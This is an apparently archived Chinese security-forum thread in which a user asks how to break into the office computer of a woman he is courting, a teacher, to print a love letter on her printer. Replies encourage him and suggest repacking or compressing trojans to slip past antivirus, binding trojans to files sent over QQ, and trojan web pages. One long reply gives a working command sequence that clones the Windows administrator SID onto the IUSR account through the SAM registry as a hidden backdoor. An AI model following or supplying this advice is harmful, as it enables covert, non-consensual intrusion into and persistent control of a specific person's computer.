论坛: 菜鸟乐园 标题: 怎么入侵一台没有丝毫漏洞的机器 复制本贴地址    
作者: windghost [windghost]    论坛用户   登录
大家好!我是一个新手。我想入侵一台机器,那台机器的主人是我喜欢的一个女孩子,我要入侵她的机器并共享她的打印机,我要从她的打印机上打印出我给她的情书。但我用一个很多软件,都不能查出她的漏洞,我也用了一些能使机器全盘共享的木马。但没有什么反应,估计被杀。我没有办法了。希望各位兄弟帮忙,赐点历害点招,或者介绍点好的后门程序。谢谢了!!!

地主 发表时间: 10/05 20:16

回复: xuebaby [xuebaby]   论坛用户   登录
首先,不管你要做什么,你得先告诉大家你要入侵的那台机子是什么操作系统。
其次,你说你用使机器全盘共享的木马?那么你的木马是以什么方式放到她的机子上的?
最后,希望有人能帮的上你的忙吧,因为泡MM是应该的哈。

B1层 发表时间: 10/05 20:35

回复: windghost [windghost]   论坛用户   登录
老兄!帮帮忙,我要入侵的那台是WIN98操作系统的。我用一个伪装成网页的共享木马给她打开了,但用网络神偷查看共享却什么也没有。我估计是被杀了。你能不能给我一个不容易查杀的共享木马程序呀?谢谢你了!!!:)

B2层 发表时间: 10/05 22:08

回复: xuebaby [xuebaby]   论坛用户   登录
呵呵,我也很想帮你啊
可惜,入侵98我还没那么高明
可惜,我一般不到万不得已我不用木马哈
真的万分抱歉,帮不上你的忙了,呵呵

B3层 发表时间: 10/05 22:10

回复: jacky8714 [jacky8714]   论坛用户   登录
把木马脱壳在加壳,就很难被宰了。


B4层 发表时间: 10/05 22:51

回复: pady [pady]   论坛用户   登录
对,加壳,然后.............美男计!

B5层 发表时间: 10/06 16:29

回复: honyry [honyry]   论坛用户   登录
我还以为有什么惊人的论题呢!
原来不过乳齿啊啊哦!

B6层 发表时间: 10/06 16:51

回复: mingming8 [mingming8]   论坛用户   登录
我希望楼主说清楚,她都开了哪些断口。
好使点的木马?
看介绍说广外女生比较毒(自我感觉不怎么样)
即然是98的,我想139可能会开!利用netbios
IGMP来攻击!
以上内容,仅供参考!


B7层 发表时间: 10/06 21:59

回复: windghost [windghost]   论坛用户   登录
兄弟!她一个端口也没开呀。我用网络神偷查了呀。没有呀。一个也没有,真是气死人的。不过她常用QQ聊天的。请问是不是能从那找突破口,但我具体不知道怎么办。如果大伙能帮忙,小弟在此谢过了。

B8层 发表时间: 10/06 22:27

回复: cck123 [cck123]   论坛用户   登录
用RAR压缩一下那个木马!

B9层 发表时间: 10/06 23:54

回复: gbs_empty [gbs_empty]   论坛用户   登录
你们关系肯定很好(因为你对她家的情况很了解),你的目的只是想给她个惊喜吧,这最简单不过了,在她电脑上装个终端服务,那你就可以通过ping访问她的整个电脑。网络方面的东西我不大擅长,有问题可去联系
GBS城市猎人,他的qq:12479816

GBS战队,打造新的电脑航母。




B10层 发表时间: 10/07 03:52

回复: goodwell [goodwell]   论坛用户   登录

经常看到一些人在入侵一台Windows 2000或者Windows NT后堂而皇之地创建一个管理员组的用户,似 乎当管理员不存在一般,今天偶违背一下偶以前的初衷,Share一个类似于RootKit的玩艺,当然,这些 过程也是可以用脚本实现的,但是我就不写了,OK,Show Time Now。

首先要让大家知道的概念是在Windows 2000和Windows NT里,默认管理员帐号的SID是固定的 500(0x1f4),那么我们可以用机器里已经存在的一个帐号将SID为500的帐号进行克隆,在这里我们选 择的帐号是IUSR_MachineName(当然,为了加强隐蔽性,我们选择了这个帐号,所有用户都可以用以下 的方法,只不过这个用户较常见罢了),测试环境为Windows 2000 Server。

运行一个System的CMD Shell( http://www.sometips.com/tips/scripts/173.htm 或使用 Http:// www.sometips.com/soft/psu.exe),然后在该CMD Shell里面运行
regedit /e adam.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
这样我们将SID 为500的管理员帐号的相关信息导出,然后编辑adam.reg文件,将adam.reg文件的第三行-- [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]最后的"1F4"修改为 IUSR_MachineName的SID(大部分的机器该用户的SID都为0x3E9,如果机器在最初安装的时候没有安装 IIS,而自己创建了帐号后再安装IIS就有可能不是这个值),将Root.reg文件中的"1F4"修改为"3E9"后执 行
regedit /s adam.reg
导入该Reg文件

然后运行
net user IUSR_MachineName Sometips
修改IUSR_MachineName的密码(最好使用14位的密码,越像IUSR_MachineName的密码越好)

OK,大功告成...

这样,我们拥有和默认管理员一样的桌面、一样的Profile.....
而且,当我们运行 net localgroup administrators 时,看看结果:
C:\>net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

------------------------------------------------------------------------
Administrator
The command completed successfully.

再看看USER2SID的输出结果:
C:\>user2sid Administrator

S-1-5-21-1004336348-1078145449-854245398-500

Number of subauthorities is 5
Domain is IDONTKNOW
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser

C:\>user2sid iusr_machinename

S-1-5-21-1004336348-1078145449-854245398-1001

Number of subauthorities is 5
Domain is IDONTKNOW
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser

我想,再高明的管理员也看不到任何的异状了...而且,随便管理员改成什么密码,我照样可以用 IUSR_MachineName,密码为Sometips登陆...(没有哪位大侠级的管理员喜欢经常修改IUSR_MachineName 为其他的名字吧)

^_^,这算不算RootKit...

附:
1、感谢叮叮付出需要reinstall OS的代价..


B11层 发表时间: 10/07 11:07

回复: goodwell [goodwell]   论坛用户   登录
为了请远程控制她的机子,先要她去吃西餐,再看电影,然后送她回家,在她的电脑上装个VNC程序,然后以每秒一万公里的速度跑回家,用QQ查看她的IP,不就可以了吗

B12层 发表时间: 10/07 11:12

回复: mingming8 [mingming8]   论坛用户   登录
一个端口没开???你在开玩笑吧!
qq一般默认是4000,6000,8000。
看看是不是,如果不是,可能对方用了代理!没办法了,找别的路径!
如果是,ip应该是真的!那不就好办了!
最简单的方法,用qq给她发个文件,再那个文件上绑上木马。

B13层 发表时间: 10/07 11:35

回复: windghost [windghost]   论坛用户   登录
对呀,她用的就是代理软件上的。她是学校的老师。那机器是她办公室的。

B14层 发表时间: 10/07 11:56

回复: windghost [windghost]   论坛用户   登录
框绑我也试过啦,她用的是带升级ID的瑞星杀毒软件。功能了得,一定是被她杀了。没法啦,救命呀!!!!!!

B15层 发表时间: 10/07 11:59

回复: mingming8 [mingming8]   论坛用户   登录
容我在想想,连老师的主意都敢打,好很!

B16层 发表时间: 10/07 12:08

回复: mingming8 [mingming8]   论坛用户   登录
就这么说我是没办法了,我希望你能把她的ip搞诉我,或是qq号!
我的qq是252350962。
事先说明,我也不一定能成功!

B17层 发表时间: 10/07 12:18

回复: bj12g [bj12g]   论坛用户   登录
精神可嘉 精神可嘉
这样吧  你先弄个网页给她  就是那个可以共享磁盘的!!!
如果你有她的QQ的话 你可以发给她  也许她不小心就点了!!!!
你可以在她的桌面上留下你的情书和玫瑰!!!!!
另外好象是有一种病毒可以攻击打印机的 我忘记是什么了 你可以在网上找找
你也许可以从病毒制造者那里得到点帮助!!!!
98的系统漏洞不少 可是用来远程登陆的可是不多!!!
有个好东东告诉你 黑洞2002 可以生成一个木马网页!!只要她浏览那个网页就中了黑洞2002了 你想做什么就做什么了!!!!


B18层 发表时间: 10/07 12:50

回复: q70213526 [q70213526]   版主   登录
加油啊!!

B19层 发表时间: 10/07 17:00

回复: zhb7769 [zhb7769]   论坛用户   登录
在这里也支持一下,精神嘉嘛

B20层 发表时间: 10/07 17:07

回复: xto [xto]   论坛用户   登录
关于这方面我还在学,知道的不是很多,技术方面不能支持你了,只能在精神上支持你啦~~~

B21层 发表时间: 10/08 05:14

回复: posedong [posedong]   论坛用户   登录
楼主什么时候~搞定了告诉我们哦~

B22层 发表时间: 10/10 06:02

回复: hebin [hebin]   论坛用户   登录
  入侵98真的很难,就是因为它功能台少,所以才难入侵,当然,要它死机办法到是多的很!

B23层 发表时间: 10/10 06:18

回复: totti [totti]   论坛用户   登录
我想泡我们辅导员了。。。。。。。。

B24层 发表时间: 10/10 09:30

回复: shwvsshw [shwvsshw]   论坛用户   登录
你也有这个想法吗
真是知已

B25层 发表时间: 10/10 10:02

回复: shwvsshw [shwvsshw]   论坛用户   登录
精神鼓励

B26层 发表时间: 10/10 10:04

回复: linyufeng9 [linyufeng9]   论坛用户   登录
看来爱情的力量真伟大
我支持你!!

B27层 发表时间: 10/10 22:51

回复: topwbn [topwbn]   论坛用户   登录
呵呵,捆绑木马偶不会。。。不过捆绑人质偶到是没事的时候,经常玩一玩。。。楼主要不要帮忙啊??
嘿嘿。。。搞定了要请拖糖啊~~~~
顶~~~~~~~~~~~~

B28层 发表时间: 10/11 00:18

回复: tordang [tordang]   论坛用户   登录
听说netbull木马不错,一般杀毒软件很难杀干净,你可以捆绑后发给她,然后就。。。。

B29层 发表时间: 10/11 22:44

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号